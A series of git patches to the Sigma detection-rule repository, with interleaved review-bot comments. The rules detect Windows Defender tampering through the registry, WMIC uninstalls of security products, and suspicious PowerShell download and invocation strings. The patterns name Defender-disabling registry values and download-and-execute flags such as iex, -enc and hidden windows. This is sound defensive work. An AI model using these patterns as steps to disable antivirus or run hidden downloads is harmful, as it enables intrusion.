https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md -status: test + - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/ +status: experimental tags: - attack.defense_evasion - attack.t1089 # an old one @@ -21,7 +22,9 @@ logsource: detection: tamper_registry: EventType: SetValue - TargetObject: 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware' + TargetObject: + - 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware' + - 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiVirus' Details: 'DWORD (0x00000001)' selection2: TargetObject: 
diff --git a/rules/windows/registry_event/registry_event_defender_realtime_protection_disabled.yml b/rules/windows/registry_event/registry_event_defender_realtime_protection_disabled.yml new file mode 100644 index 00000000..2eb860fa --- /dev/null +++ b/rules/windows/registry_event/registry_event_defender_realtime_protection_disabled.yml @@ -0,0 +1,36 @@ +title: Windows Defender Real-Time Protection Disabled +id: fd115e64-97c7-491f-951c-fc8da7e042fa +description: Detects disabling Windows Defender Real-Time Protection by modifying registry +date: 2021/10/18 +author: AlertIQ +references: + - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/ + - https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105 +status: experimental +tags: + - attack.defense_evasion + - attack.t1562.001 +logsource: + product: windows + category: registry_event +detection: + tamper_registry1: + EventType: SetValue + TargetObject: + - 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring' + - 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection' + - 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection' + - 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring' + - 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable' + - 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet\DisableBlockAtFirstSeen' + Details: 'DWORD (0x00000001)' + tamper_registry2: + EventType: SetValue + TargetObject: + - 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet\SpynetReporting' + - 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet\SubmitSamplesConsent' + Details: 'DWORD (0x00000000)' + condition: tamper_registry1 or tamper_registry2 +falsepositives: + - Administrator actions +level: high \ No newline at end of file 
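Review bot: `tamper_registry2` treats `SpyNet\SubmitSamplesConsent` set to `DWORD (0x00000000)` as tampering, but for that policy 0 means "always prompt" while 2 means "never send"; the Defender-disabling scripts I know of write 2 (`Set-MpPreference -SubmitSamplesConsent NeverSend`), so this entry likely never fires on the behaviour it targets. Split it into its own selection matching `Details: 'DWORD (0x00000002)'` (optionally also 0 if prompting is considered a downgrade) and verify the value against the gist cited in references. `SpynetReporting` = 0 is, to my knowledge, the correct disabled value and can stay. The file also lacks a trailing newline.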
From 40e8dc506aaf58d6fc7a765667b69c15f2fb0bc5 Mon Sep 17 00:00:00 2001
From: frack113
Date: Mon, 18 Oct 2021 11:19:18 +0200
Subject: [PATCH 1260/1367] update product list

---
 ...n_susp_wmic_security_product_uninstall.yml | 20 ++++++++++++++-----
 1 file changed, 15 insertions(+), 5 deletions(-)

diff --git a/rules/windows/process_creation/win_susp_wmic_security_product_uninstall.yml b/rules/windows/process_creation/win_susp_wmic_security_product_uninstall.yml
index 68e3f491..11e06462 100644
--- a/rules/windows/process_creation/win_susp_wmic_security_product_uninstall.yml
+++ b/rules/windows/process_creation/win_susp_wmic_security_product_uninstall.yml
@@ -3,7 +3,9 @@ id: 847d5ff3-8a31-4737-a970-aeae8fe21765
 description: Detects deinstallation of security products using WMIC utility
 references:
     - https://twitter.com/cglyer/status/1355171195654709249
+    - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/
 date: 2021/01/30
+modified: 2021/10/18
 status: experimental
 author: Florian Roth
 tags:
@@ -22,13 +24,21 @@ detection:
     selection_product:
         CommandLine|contains:
             - 'Antivirus'
-            - 'Endpoint Security'
-            - 'Endpoint Detection'
+            - 'AVG '
             - 'Crowdstrike Sensor'
-            - 'Windows Defender'
-            - 'VirusScan'
-            - 'Threat Protection'
+            - 'DLP Endpoint'
+            - 'Endpoint Detection'
+            - 'Endpoint Protection'
+            - 'Endpoint Security'
             - 'Endpoint Sensor'
+            - 'ESET File Security'
+            - 'Malwarebytes'
+            - 'McAfee Agent'
+            - 'Microsoft Security Client'
+            - 'Threat Protection'
+            - 'VirusScan'
+            - 'Webroot SecureAnywhere'
+            - 'Windows Defender'
     condition: selection and selection_product
 falsepositives:
     - Legitimate administration
From 278c01c59fc2e5ffe42749b45fa5a3ddf870c44d Mon Sep 17 00:00:00 2001
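Review bot: `'AVG '` is the only entry padded with a trailing space, so a command that names the product as a prefix pattern (`name like 'AVG%'`) or ends the string right after the vendor name is not matched, while every other vendor string in the list would be. If the space is there to keep unrelated tokens containing "avg" from firing, a comment saying so would help; otherwise `- 'AVG'` is consistent with the rest. The `selection` that the condition combines with starts above the hunk.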
From: frack113 Date: Mon, 18 Oct 2021 14:12:10 +0200 Subject: [PATCH 1261/1367] move to deprecated --- .../{powershell => deprecated}/powershell_suspicious_download.yml | 0 .../powershell_suspicious_invocation_generic.yml | 0 .../powershell_suspicious_invocation_specific.yml | 0 .../powershell_syncappvpublishingserver_exe.yml | 0 4 files changed, 0 insertions(+), 0 deletions(-) rename rules/windows/{powershell => deprecated}/powershell_suspicious_download.yml (100%) rename rules/windows/{powershell => deprecated}/powershell_suspicious_invocation_generic.yml (100%) rename rules/windows/{powershell => deprecated}/powershell_suspicious_invocation_specific.yml (100%) rename rules/windows/{powershell => deprecated}/powershell_syncappvpublishingserver_exe.yml (100%) diff --git a/rules/windows/powershell/powershell_suspicious_download.yml b/rules/windows/deprecated/powershell_suspicious_download.yml similarity index 100% rename from rules/windows/powershell/powershell_suspicious_download.yml rename to rules/windows/deprecated/powershell_suspicious_download.yml diff --git a/rules/windows/powershell/powershell_suspicious_invocation_generic.yml b/rules/windows/deprecated/powershell_suspicious_invocation_generic.yml similarity index 100% rename from rules/windows/powershell/powershell_suspicious_invocation_generic.yml rename to rules/windows/deprecated/powershell_suspicious_invocation_generic.yml diff --git a/rules/windows/powershell/powershell_suspicious_invocation_specific.yml b/rules/windows/deprecated/powershell_suspicious_invocation_specific.yml similarity index 100% rename from rules/windows/powershell/powershell_suspicious_invocation_specific.yml rename to rules/windows/deprecated/powershell_suspicious_invocation_specific.yml 
diff --git a/rules/windows/powershell/powershell_syncappvpublishingserver_exe.yml b/rules/windows/deprecated/powershell_syncappvpublishingserver_exe.yml similarity index 100% rename from rules/windows/powershell/powershell_syncappvpublishingserver_exe.yml rename to rules/windows/deprecated/powershell_syncappvpublishingserver_exe.yml From 19da3ac07f41f988c9611131d7a98ce2756ce5bd Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 18 Oct 2021 14:12:52 +0200 Subject: [PATCH 1262/1367] add ps_module version --- ...ell_suspicious_download_in_contextinfo.yml | 29 ++++++++ ...ious_invocation_generic_in_contextinfo.yml | 36 ++++++++++ ...ous_invocation_specific_in_contextinfo.yml | 67 +++++++++++++++++++ ...ppvpublishingserver_exe_in_contextinfo.yml | 27 ++++++++ 4 files changed, 159 insertions(+) create mode 100644 rules/windows/powershell/powershell_module/powershell_suspicious_download_in_contextinfo.yml create mode 100644 rules/windows/powershell/powershell_module/powershell_suspicious_invocation_generic_in_contextinfo.yml create mode 100644 rules/windows/powershell/powershell_module/powershell_suspicious_invocation_specific_in_contextinfo.yml create mode 100644 rules/windows/powershell/powershell_module/powershell_syncappvpublishingserver_exe_in_contextinfo.yml diff --git a/rules/windows/powershell/powershell_module/powershell_suspicious_download_in_contextinfo.yml b/rules/windows/powershell/powershell_module/powershell_suspicious_download_in_contextinfo.yml new file mode 100644 index 00000000..1cd4d88a --- /dev/null +++ b/rules/windows/powershell/powershell_module/powershell_suspicious_download_in_contextinfo.yml 
@@ -0,0 +1,29 @@ +title: Suspicious PowerShell Download +id: de41232e-12e8-49fa-86bc-c05c7e722df9 +related: + - id: 65531a81-a694-4e31-ae04-f8ba5bc33759 + type: derived +status: experimental +description: Detects suspicious PowerShell download command +tags: + - attack.execution + - attack.t1059.001 + - attack.t1086 #an old one +author: Florian Roth +date: 2017/03/05 +modified: 2021/10/18 +logsource: + product: windows + category: ps_module +detection: + webclient: + ContextInfo|contains: + - 'System.Net.WebClient' + download: + ContextInfo|contains: + - '.DownloadFile(' + - '.DownloadString(' + condition: webclient and download +falsepositives: + - PowerShell scripts that download content from the Internet +level: medium \ No newline at end of file diff --git a/rules/windows/powershell/powershell_module/powershell_suspicious_invocation_generic_in_contextinfo.yml b/rules/windows/powershell/powershell_module/powershell_suspicious_invocation_generic_in_contextinfo.yml new file mode 100644 index 00000000..7ea09209 --- /dev/null +++ b/rules/windows/powershell/powershell_module/powershell_suspicious_invocation_generic_in_contextinfo.yml 
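Review bot: The `download` selection stops at `.DownloadFile(` and `.DownloadString(`, while `System.Net.WebClient` also exposes `DownloadData(` and `OpenRead(`, which scripts use for the same purpose, so a WebClient download via those methods does not fire; if the derived rule's scope allows, add `- '.DownloadData('` and `- '.OpenRead('`. Since the rule is marked `derived` from 65531a81 but keeps that rule's 2017 date, a short note that this is the ps_module (ContextInfo) copy would help readers see why the two coexist.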
@@ -0,0 +1,36 @@ +title: Suspicious PowerShell Invocations - Generic +id: bbb80e91-5746-4fbe-8898-122e2cafdbf4 +related: + id: 3d304fda-78aa-43ed-975c-d740798a49c1 + type: derived +status: experimental +description: Detects suspicious PowerShell invocation command parameters +tags: + - attack.execution + - attack.t1059.001 + - attack.t1086 #an old one +author: Florian Roth (rule) +date: 2017/03/12 +modified: 2021/10/18 +logsource: + product: windows + category: ps_module +detection: + encoded: + ContextInfo|contains: + - ' -enc ' + - ' -EncodedCommand ' + hidden: + ContextInfo|contains: + - ' -w hidden ' + - ' -window hidden ' + - ' -windowstyle hidden ' + noninteractive: + ContextInfo|contains: + - ' -noni ' + - ' -noninteractive ' + condition: all of them +falsepositives: + - Penetration tests + - Very special / sneaky PowerShell scripts +level: high diff --git a/rules/windows/powershell/powershell_module/powershell_suspicious_invocation_specific_in_contextinfo.yml b/rules/windows/powershell/powershell_module/powershell_suspicious_invocation_specific_in_contextinfo.yml new file mode 100644 index 00000000..747f5270 --- /dev/null +++ b/rules/windows/powershell/powershell_module/powershell_suspicious_invocation_specific_in_contextinfo.yml 
@@ -0,0 +1,67 @@ +title: Suspicious PowerShell Invocations - Specific +id: 8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090 +related: + - id: fce5f582-cc00-41e1-941a-c6fabf0fdb8c + type: derived +status: experimental +description: Detects suspicious PowerShell invocation command parameters +tags: + - attack.execution + - attack.t1059.001 + - attack.t1086 #an old one +author: Florian Roth (rule), Jonhnathan Ribeiro +date: 2017/03/05 +modified: 2021/10/18 +logsource: + product: windows + category: ps_module + definition: Script block logging must be enabled +detection: + convert_b64: + ContextInfo|contains|all: + - '-nop' + - ' -w ' + - 'hidden' + - ' -c ' + - '[Convert]::FromBase64String' + iex_selection: + ContextInfo|contains|all: + - ' -w ' + - 'hidden' + - '-noni' + - '-nop' + - ' -c ' + - 'iex' + - 'New-Object' + enc_selection: + ContextInfo|contains|all: + - ' -w ' + - 'hidden' + - '-ep' + - 'bypass' + - '-Enc' + reg_selection: + ContextInfo|contains|all: + - 'powershell' + - 'reg' + - 'add' + - 'HKCU\software\microsoft\windows\currentversion\run' + webclient_selection: + ContextInfo|contains|all: + - 'bypass' + - '-noprofile' + - '-windowstyle' + - 'hidden' + - 'new-object' + - 'system.net.webclient' + - '.download' + iex_webclient: + ContextInfo|contains|all: + - 'iex' + - 'New-Object' + - 'Net.WebClient' + - '.Download' + condition: 1 of them +falsepositives: + - Penetration tests +level: high diff --git a/rules/windows/powershell/powershell_module/powershell_syncappvpublishingserver_exe_in_contextinfo.yml b/rules/windows/powershell/powershell_module/powershell_syncappvpublishingserver_exe_in_contextinfo.yml new file mode 100644 index 00000000..c3baddcf --- /dev/null +++ b/rules/windows/powershell/powershell_module/powershell_syncappvpublishingserver_exe_in_contextinfo.yml 
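Review bot: `definition: Script block logging must be enabled` contradicts the logsource: `category: ps_module` with a `ContextInfo` field is populated by PowerShell module logging (event 4103), not by script block logging (4104), so deployers are told to enable the wrong prerequisite; change it to `definition: PowerShell module logging must be enabled` and leave the script-block wording to the ps_script sibling. Separately, `reg_selection` requires the token `powershell` in ContextInfo; if that field routinely carries the host application path, the token adds nothing and the selection effectively reduces to `reg add ... Run`, which is worth confirming against a sample 4103 event.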
@@ -0,0 +1,27 @@ +title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction +id: fe5ce7eb-dad8-467c-84a9-31ec23bd644a +related: + - id: fde7929d-8beb-4a4c-b922-be9974671667 + type: derived + - id: 9f7aa113-9da6-4a8d-907c-5f1a4b908299 + type: derived +description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. +references: + - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ +author: 'Ensar Şamil, @sblmsrsn, OSCD Community' +date: 2020/10/05 +modified: 2021/10/18 +tags: + - attack.defense_evasion + - attack.t1218 +logsource: + product: windows + category: ps_module +detection: + selection: + ContextInfo|contains: + - 'SyncAppvPublishingServer.exe' + condition: selection +falsepositives: + - App-V clients +level: medium \ No newline at end of file From d866b10590bb9f9f1a8413a5f0d0343982dc53ea Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 18 Oct 2021 14:13:29 +0200 Subject: [PATCH 1263/1367] add ps_script verison --- ...suspicious_download_in_scriptblocktext.yml | 29 ++++++++ ..._invocation_generic_in_scriptblocktext.yml | 36 ++++++++++ ..._invocation_specific_in_scripblocktext.yml | 67 +++++++++++++++++++ ...ublishingserver_exe_in_scriptblocktext.yml | 27 ++++++++ 4 files changed, 159 insertions(+) create mode 100644 rules/windows/powershell/powershell_script/powershell_suspicious_download_in_scriptblocktext.yml create mode 100644 rules/windows/powershell/powershell_script/powershell_suspicious_invocation_generic_in_scriptblocktext.yml create mode 100644 rules/windows/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml create mode 100644 rules/windows/powershell/powershell_script/powershell_syncappvpublishingserver_exe_in_scriptblocktext.yml 
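Review bot: The rule has no `status` field, unlike the other three rules in this commit, which all set `status: experimental`; add `status: experimental` so tooling that filters or reports on status can classify it. The description speaks of process execution, but what the detection matches is the string inside module-logging ContextInfo, so a wording such as "Detects PowerShell module activity hosted by SyncAppvPublishingServer.exe, which adversaries use to bypass PowerShell execution restrictions" would describe what actually fires. The ps_script copy in the next commit has the same missing `status`.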
diff --git a/rules/windows/powershell/powershell_script/powershell_suspicious_download_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_suspicious_download_in_scriptblocktext.yml new file mode 100644 index 00000000..f31303da --- /dev/null +++ b/rules/windows/powershell/powershell_script/powershell_suspicious_download_in_scriptblocktext.yml @@ -0,0 +1,29 @@ +title: Suspicious PowerShell Download +id: 403c2cc0-7f6b-4925-9423-bfa573bed7eb +related: + - id: 65531a81-a694-4e31-ae04-f8ba5bc33759 + type: derived +status: experimental +description: Detects suspicious PowerShell download command +tags: + - attack.execution + - attack.t1059.001 + - attack.t1086 #an old one +author: Florian Roth +date: 2017/03/05 +modified: 2021/10/18 +logsource: + product: windows + category: ps_script +detection: + webclient: + ScriptBlockText|contains: + - 'System.Net.WebClient' + download: + ScriptBlockText|contains: + - '.DownloadFile(' + - '.DownloadString(' + condition: webclient and download +falsepositives: + - PowerShell scripts that download content from the Internet +level: medium \ No newline at end of file diff --git a/rules/windows/powershell/powershell_script/powershell_suspicious_invocation_generic_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_suspicious_invocation_generic_in_scriptblocktext.yml new file mode 100644 index 00000000..9b175b6f --- /dev/null +++ b/rules/windows/powershell/powershell_script/powershell_suspicious_invocation_generic_in_scriptblocktext.yml 
@@ -0,0 +1,36 @@ +title: Suspicious PowerShell Invocations - Generic +id: ed965133-513f-41d9-a441-e38076a0798f +related: + id: 3d304fda-78aa-43ed-975c-d740798a49c1 + type: derived +status: experimental +description: Detects suspicious PowerShell invocation command parameters +tags: + - attack.execution + - attack.t1059.001 + - attack.t1086 #an old one +author: Florian Roth (rule) +date: 2017/03/12 +modified: 2021/10/18 +logsource: + product: windows + category: ps_script +detection: + encoded: + ScriptBlockText|contains: + - ' -enc ' + - ' -EncodedCommand ' + hidden: + ScriptBlockText|contains: + - ' -w hidden ' + - ' -window hidden ' + - ' -windowstyle hidden ' + noninteractive: + ScriptBlockText|contains: + - ' -noni ' + - ' -noninteractive ' + condition: all of them +falsepositives: + - Penetration tests + - Very special / sneaky PowerShell scripts +level: high diff --git a/rules/windows/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml b/rules/windows/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml new file mode 100644 index 00000000..89489c32 --- /dev/null +++ b/rules/windows/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml 
@@ -0,0 +1,67 @@ +title: Suspicious PowerShell Invocations - Specific +id: ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71 +related: + - id: fce5f582-cc00-41e1-941a-c6fabf0fdb8c + type: derived +status: experimental +description: Detects suspicious PowerShell invocation command parameters +tags: + - attack.execution + - attack.t1059.001 + - attack.t1086 #an old one +author: Florian Roth (rule), Jonhnathan Ribeiro +date: 2017/03/05 +modified: 2021/10/18 +logsource: + product: windows + category: ps_script + definition: Script block logging must be enabled +detection: + convert_b64: + ScriptBlockText|contains|all: + - '-nop' + - ' -w ' + - 'hidden' + - ' -c ' + - '[Convert]::FromBase64String' + iex_selection: + ScriptBlockText|contains|all: + - ' -w ' + - 'hidden' + - '-noni' + - '-nop' + - ' -c ' + - 'iex' + - 'New-Object' + enc_selection: + ScriptBlockText|contains|all: + - ' -w ' + - 'hidden' + - '-ep' + - 'bypass' + - '-Enc' + reg_selection: + ScriptBlockText|contains|all: + - 'powershell' + - 'reg' + - 'add' + - 'HKCU\software\microsoft\windows\currentversion\run' + webclient_selection: + ScriptBlockText|contains|all: + - 'bypass' + - '-noprofile' + - '-windowstyle' + - 'hidden' + - 'new-object' + - 'system.net.webclient' + - '.download' + iex_webclient: + ScriptBlockText|contains|all: + - 'iex' + - 'New-Object' + - 'Net.WebClient' + - '.Download' + condition: 1 of them +falsepositives: + - Penetration tests +level: high diff --git a/rules/windows/powershell/powershell_script/powershell_syncappvpublishingserver_exe_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_syncappvpublishingserver_exe_in_scriptblocktext.yml new file mode 100644 index 00000000..30e37a01 --- /dev/null +++ b/rules/windows/powershell/powershell_script/powershell_syncappvpublishingserver_exe_in_scriptblocktext.yml 
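Review bot: The new file is created as `powershell_suspicious_invocation_specific_in_scripblocktext.yml` (file header just above this hunk), missing the `t` in `scriptblocktext` that its three siblings use; rename it so path-based tooling and grep find it alongside the others. Within the detection, `reg_selection` requires `powershell` to appear in ScriptBlockText, which a script that runs `reg add HKCU\...\Run` directly will not contain, so that selection mostly catches scripts that spawn a second powershell; if that is intentional a comment should say so, otherwise drop the token.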
@@ -0,0 +1,27 @@ +title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction +id: dddfebae-c46f-439c-af7a-fdb6bde90218 +related: + - id: fde7929d-8beb-4a4c-b922-be9974671667 + type: derived + - id: 9f7aa113-9da6-4a8d-907c-5f1a4b908299 + type: derived +description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. +references: + - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ +author: 'Ensar Şamil, @sblmsrsn, OSCD Community' +date: 2020/10/05 +modified: 2021/10/18 +tags: + - attack.defense_evasion + - attack.t1218 +logsource: + product: windows + category: ps_script +detection: + selection: + ScriptBlockText|contains: + - 'SyncAppvPublishingServer.exe' + condition: selection +falsepositives: + - App-V clients +level: medium \ No newline at end of file From 0e1c156ddfc38bb7edfe39c9f3870826d234c687 Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 18 Oct 2021 14:26:06 +0200 Subject: [PATCH 1264/1367] fix related --- ...owershell_suspicious_invocation_generic_in_contextinfo.yml | 4 ++-- ...shell_suspicious_invocation_generic_in_scriptblocktext.yml | 4 ++-- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/rules/windows/powershell/powershell_module/powershell_suspicious_invocation_generic_in_contextinfo.yml b/rules/windows/powershell/powershell_module/powershell_suspicious_invocation_generic_in_contextinfo.yml index 7ea09209..93e5ecb5 100644 --- a/rules/windows/powershell/powershell_module/powershell_suspicious_invocation_generic_in_contextinfo.yml +++ b/rules/windows/powershell/powershell_module/powershell_suspicious_invocation_generic_in_contextinfo.yml 
@@ -1,8 +1,8 @@ title: Suspicious PowerShell Invocations - Generic id: bbb80e91-5746-4fbe-8898-122e2cafdbf4 related: - id: 3d304fda-78aa-43ed-975c-d740798a49c1 - type: derived + - id: 3d304fda-78aa-43ed-975c-d740798a49c1 + type: derived status: experimental description: Detects suspicious PowerShell invocation command parameters tags: diff --git a/rules/windows/powershell/powershell_script/powershell_suspicious_invocation_generic_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_suspicious_invocation_generic_in_scriptblocktext.yml index 9b175b6f..94529b39 100644 --- a/rules/windows/powershell/powershell_script/powershell_suspicious_invocation_generic_in_scriptblocktext.yml +++ b/rules/windows/powershell/powershell_script/powershell_suspicious_invocation_generic_in_scriptblocktext.yml @@ -1,8 +1,8 @@ title: Suspicious PowerShell Invocations - Generic id: ed965133-513f-41d9-a441-e38076a0798f related: - id: 3d304fda-78aa-43ed-975c-d740798a49c1 - type: derived + - id: 3d304fda-78aa-43ed-975c-d740798a49c1 + type: derived status: experimental description: Detects suspicious PowerShell invocation command parameters tags: From faa407dacc909b098d96654df00f44d1ad0e299b Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 18 Oct 2021 14:52:35 +0200 Subject: [PATCH 1265/1367] cleanup list --- .../powershell_suspicious_download_in_contextinfo.yml | 3 +-- .../powershell_syncappvpublishingserver_exe_in_contextinfo.yml | 3 +-- .../powershell_suspicious_download_in_scriptblocktext.yml | 3 +-- ...ershell_syncappvpublishingserver_exe_in_scriptblocktext.yml | 3 +-- 4 files changed, 4 insertions(+), 8 deletions(-) diff --git a/rules/windows/powershell/powershell_module/powershell_suspicious_download_in_contextinfo.yml b/rules/windows/powershell/powershell_module/powershell_suspicious_download_in_contextinfo.yml index 1cd4d88a..09770894 100644 --- a/rules/windows/powershell/powershell_module/powershell_suspicious_download_in_contextinfo.yml 
+++ b/rules/windows/powershell/powershell_module/powershell_suspicious_download_in_contextinfo.yml @@ -17,8 +17,7 @@ logsource: category: ps_module detection: webclient: - ContextInfo|contains: - - 'System.Net.WebClient' + ContextInfo|contains: 'System.Net.WebClient' download: ContextInfo|contains: - '.DownloadFile(' diff --git a/rules/windows/powershell/powershell_module/powershell_syncappvpublishingserver_exe_in_contextinfo.yml b/rules/windows/powershell/powershell_module/powershell_syncappvpublishingserver_exe_in_contextinfo.yml index c3baddcf..50adcdf3 100644 --- a/rules/windows/powershell/powershell_module/powershell_syncappvpublishingserver_exe_in_contextinfo.yml +++ b/rules/windows/powershell/powershell_module/powershell_syncappvpublishingserver_exe_in_contextinfo.yml @@ -19,8 +19,7 @@ logsource: category: ps_module detection: selection: - ContextInfo|contains: - - 'SyncAppvPublishingServer.exe' + ContextInfo|contains: 'SyncAppvPublishingServer.exe' condition: selection falsepositives: - App-V clients diff --git a/rules/windows/powershell/powershell_script/powershell_suspicious_download_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_suspicious_download_in_scriptblocktext.yml index f31303da..b33c4bea 100644 --- a/rules/windows/powershell/powershell_script/powershell_suspicious_download_in_scriptblocktext.yml +++ b/rules/windows/powershell/powershell_script/powershell_suspicious_download_in_scriptblocktext.yml @@ -17,8 +17,7 @@ logsource: category: ps_script detection: webclient: - ScriptBlockText|contains: - - 'System.Net.WebClient' + ScriptBlockText|contains: 'System.Net.WebClient' download: ScriptBlockText|contains: - '.DownloadFile(' diff --git a/rules/windows/powershell/powershell_script/powershell_syncappvpublishingserver_exe_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_syncappvpublishingserver_exe_in_scriptblocktext.yml index 30e37a01..7dfbaa60 100644 
--- a/rules/windows/powershell/powershell_script/powershell_syncappvpublishingserver_exe_in_scriptblocktext.yml +++ b/rules/windows/powershell/powershell_script/powershell_syncappvpublishingserver_exe_in_scriptblocktext.yml @@ -19,8 +19,7 @@ logsource: category: ps_script detection: selection: - ScriptBlockText|contains: - - 'SyncAppvPublishingServer.exe' + ScriptBlockText|contains: 'SyncAppvPublishingServer.exe' condition: selection falsepositives: - App-V clients From 6c86500414d6f6ed61dd12bdb8111270d686da4e Mon Sep 17 00:00:00 2001 From: WojciechLesicki Date: Mon, 18 Oct 2021 21:34:05 +0200 Subject: [PATCH 1266/1367] Description changes acording to https://github.com/SwiftOnSecurity/sysmon-config/pull/151 --- rules/windows/pipe_created/sysmon_mal_cobaltstrike.yml | 2 +- rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml | 2 +- .../pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml | 2 +- .../windows/pipe_created/sysmon_susp_wmi_consumer_namedpipe.yml | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/rules/windows/pipe_created/sysmon_mal_cobaltstrike.yml b/rules/windows/pipe_created/sysmon_mal_cobaltstrike.yml index 89612067..80ada94e 100644 --- a/rules/windows/pipe_created/sysmon_mal_cobaltstrike.yml +++ b/rules/windows/pipe_created/sysmon_mal_cobaltstrike.yml 
@@ -16,7 +16,7 @@ tags: logsource: product: windows category: pipe_created - definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). In the current popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config) this is not there, you have to add it yourself or use this extended version that logs the Named Pipes used in this Sigma repo (https://github.com/Neo23x0/sysmon-config)' + definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular' detection: selection_MSSE: PipeName|contains|all: diff --git a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml index cc18f34d..affe16b4 100644 --- a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml +++ b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml 
@@ -15,7 +15,7 @@ tags: logsource: product: windows category: pipe_created - definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). In the current popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config) this is not there, you have to add it yourself or use this extended version that logs the Named Pipes used in this Sigma repo (https://github.com/Neo23x0/sysmon-config)' + definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular' detection: selection: - PipeName|re: '\\\\mojo\.5688\.8052\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' diff --git a/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml b/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml index 52c6de08..79ea5a81 100644 --- a/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml +++ b/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml 
@@ -15,7 +15,7 @@ tags: logsource: product: windows category: pipe_created - definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). In the current popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config) this is not there, you have to add it yourself or use this extended version that logs the Named Pipes used in this Sigma repo (https://github.com/Neo23x0/sysmon-config)' + definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular' detection: selection_malleable_profiles: - PipeName|startswith: diff --git a/rules/windows/pipe_created/sysmon_susp_wmi_consumer_namedpipe.yml b/rules/windows/pipe_created/sysmon_susp_wmi_consumer_namedpipe.yml index 44954d47..dfb28c36 100644 --- a/rules/windows/pipe_created/sysmon_susp_wmi_consumer_namedpipe.yml +++ b/rules/windows/pipe_created/sysmon_susp_wmi_consumer_namedpipe.yml 
